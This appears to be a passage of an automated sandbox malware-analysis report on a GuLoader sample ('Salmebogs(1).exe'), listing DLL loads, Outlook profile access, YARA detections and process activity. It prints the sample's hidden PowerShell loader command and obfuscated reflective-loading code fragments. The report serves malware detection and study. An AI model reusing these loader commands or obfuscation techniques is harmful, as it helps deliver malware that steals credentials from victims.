            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Salmebogs(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Semiaci.Absorbe$PotboysWsabbathaAbominarUnbraineIvr.stthVate maoG dekryu ndustrsGratinei UndervnNeelaprgaktor t Katharo(La,dsheTUltra orFe ruaraLyophilnRaspninsKaraktepEvenso.iAfstrafrV nillieSkjtelbdShulslb Tillokk' Genera ForsimpKc,clamieHallah sRecipietOscillor grinnieJa akar$TomatpuScryp ozl Nedkasakett,emvDelatine alvinisUndefaujPubianlp Openes BisageraFo raad Sni ter SmaaskoT iotunsHexateutSpea erhTapperiSMaila,lknonpurirOfficeraToxemiaaAthletilEla.ticeTuumbjeoPepoa opReserveeHjarne,lStormfauConfedeblin smelTestame fejlr dt Microc,ReincaruTerapeusPopolarsBagtjsdesailboar Tolvtav .ubobso pbygniDTrea riaOvermenlSuperbaeHypersenFinaleneBssepi.sGrvlingnRemi gtB rgentie reman aDeta.jetOverprou RisikotDrkikkeiG mbleroCycloheTCort deoCh,naner eleporpPo tordiFindelefOverdrei A dedus Weakyp,Kalkuleo idenumrOverbygt Crema,v CriticaPetu tssLitterruNo dige OrbatioCKo trolabjergnilA,drianfPromotikUdsalgsrAarvaagsWheneerLSt ngrio rerinddLokalplsLeopards C phalt.ubspac.Fetichd Interne AllophMrundioreEnnisindLan ingi O tregtNillek eF,mreap-C tacyluFibro.pdbris,remTvrs iteBerigtijKuns ans ndownlsolso.tbSclerozBBundedeeLoranstvOc,lusii Bullyb s rmforsTidsspitPrewelwx DormmiPOncominiForbehod hu tled EnclitlHomotheePoechorsUdsttelo LuvishEFreqfyrxMandssapUnd rsglo muntro MoseloiAbastartFilicalrDiatermHTrn.brnjGriz.lyeS.bdepumR ngvejm flbshue rossamvLanceri Burtyle CheweleC hanne BondmamMisplanpEfterbreForelstnco,peti$CantilaaUncrankcCubiconaSammen,tS oebruhLykketaa idtsamr Goobers KomparRUrm geraStripinm KardioaMegaloct ark,iseSalmonblInsuffitRecidivSDisc.mfiPens,onm B anch,TvillinlMicroneiUlighedsMamoncirFidolacA TalkvapLi,itoroDagsord .noglemhfunktiot Ansigth Poss saopalineFScoopinrTonnageaStriglegMaximilmKulhydreMetabionSponsora StoftrSEkstatilEnforciuFor,alisPrelatieAn,lebep navig oLej kastFigurae SystemrH samplivL nglyi.F gelejrBeboelid Te,lbraAftensmkOb.ekti,Marc raa PolitinBa knina SvovldaMa noliner dicae RedargtAudiber' Sa nci)backv,l source: powershell.exe, 00000002.00000002.3452317093.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \System.Core.pdb{ source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Stemmeurnes.exe, Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.3458185986.0000000008351000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000006.00000002.3666544295.0000000003F01000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3459194862.000000000BAC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Guignol $Lacerable $gallimaufries), (Kyathoi @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hjsderne = [AppDomain]::CurrentDomain.GetAssemblies()$global:C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tilslutningspligts)), $straatktushfly).DefineDynamicModule($Suffices69, $false).DefineType($Forkasteligt, $Dictaen, [System.MulticastD
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\Salmebogs(1).exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
            Source: C:\Users\user\Desktop\Salmebogs(1).exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_045AA492 pushfd ; ret 2_2_045AA4A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_045AE9F9 push eax; mov dword ptr [esp], edx2_2_045AEA0C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074E1DF0 push 6CC34714h; ret 2_2_074E1FA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_074E32E4 push 6CC34714h; ret 2_2_074E332D
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FABA3C push ebp; retf 7_2_02FABA3F
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB832B push ebp; iretd 7_2_02FB8336
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBC855 push 7D63EB29h; ret 7_2_02FBC85A
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBF9D3 push cs; ret 7_2_02FBF9AB
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBE9AA push esi; iretd 7_2_02FBE9AB
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBF99F push cs; ret 7_2_02FBF9AB
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FAB6AF push es; iretd 7_2_02FAB6B3
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBBFF9 push ss; ret 7_2_02FBC00D
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FB2CB6 pushfd ; iretd 7_2_02FB2CBD
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeCode function: 7_2_02FBC42A push eax; ret 7_2_02FBC42D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034309AD push ecx; mov dword ptr [esp], ecx8_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0312537A push cs; ret 8_2_031253F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_031232DC push ss; ret 8_2_031232DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03126628 push edx; retf 8_2_0312662E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_031286E5 push cs; ret 8_2_031286EA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_031244DE push ebx; ret 8_2_031244E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03125BA8 push esp; iretd 8_2_03125BAA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03123BCB push ecx; retf 8_2_03123BD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03123BC8 push esi; iretd 8_2_03123BCA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03125A76 push esi; iretd 8_2_03125A85
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03125992 push ecx; retf 8_2_0312599A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03128800 push ecx; iretd 8_2_03128806
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03123F95 push esi; iretd 8_2_03123FA6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03126E13 push esi; retf 0000h8_2_03126E14
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03123EE0 push edx; iretd 8_2_03123EE2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00759146 pushfd ; iretd 8_2_0075914D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0075E2DA pushfd ; ret 8_2_0075E2DB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
